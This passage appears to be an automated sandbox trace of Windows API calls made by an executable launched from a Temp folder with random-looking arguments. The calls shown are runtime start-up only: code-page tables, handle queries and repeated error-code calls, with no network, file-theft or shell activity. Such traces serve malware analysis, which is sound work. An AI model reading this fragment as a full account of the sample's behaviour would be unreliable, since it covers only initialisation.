cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13707d0)) [0115.692] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0115.692] GetFileType (hFile=0x3) returned 0x0 [0115.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.692] GetFileType (hFile=0x7) returned 0x0 [0115.692] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0115.692] GetFileType (hFile=0xb) returned 0x0 [0115.692] SetHandleCount (uNumber=0x20) returned 0x20 [0115.692] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0115.692] GetEnvironmentStringsW () returned 0x15fc88* [0115.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0115.692] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13711f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0115.692] FreeEnvironmentStringsW (penv=0x15fc88) returned 1 [0115.692] GetLastError () returned 0x6 [0115.692] SetLastError (dwErrCode=0x6) [0115.692] GetLastError () returned 0x6 [0115.692] SetLastError (dwErrCode=0x6) [0115.692] GetLastError () returned 0x6 [0115.692] SetLastError (dwErrCode=0x6) [0115.692] GetACP () returned 0x4e4 [0115.693] GetLastError () returned 0x6 [0115.693] SetLastError (dwErrCode=0x6) [0115.693] IsValidCodePage (CodePage=0x4e4) returned 1 [0115.693] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0115.693] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0115.693] GetLastError () returned 0x6 [0115.693] SetLastError (dwErrCode=0x6) [0115.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0115.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0115.693] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0115.693] GetLastError () returned 0x6 [0115.693] SetLastError (dwErrCode=0x6) [0115.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0115.693] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ") returned 256 [0115.694] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0115.694] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 
¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0115.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa9\x29\x8d\x86\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0115.694] GetLastError () returned 0x6 [0115.694] SetLastError (dwErrCode=0x6) [0115.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0115.694] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ") returned 256 [0115.694] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0115.694] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ參聿ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0115.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\xa9\x29\x8d\x86\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0115.694] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.694] SetLastError (dwErrCode=0x0) [0115.694] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError (dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.695] SetLastError 
(dwErrCode=0x0) [0115.695] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.696] GetLastError () returned 0x0 [0115.696] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError 
(dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.697] GetLastError () returned 0x0 [0115.697] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.698] SetLastError (dwErrCode=0x0) [0115.698] GetLastError () returned 0x0 [0115.699] SetLastError (dwErrCode=0x0) [0115.699] GetLastError () returned 0x0 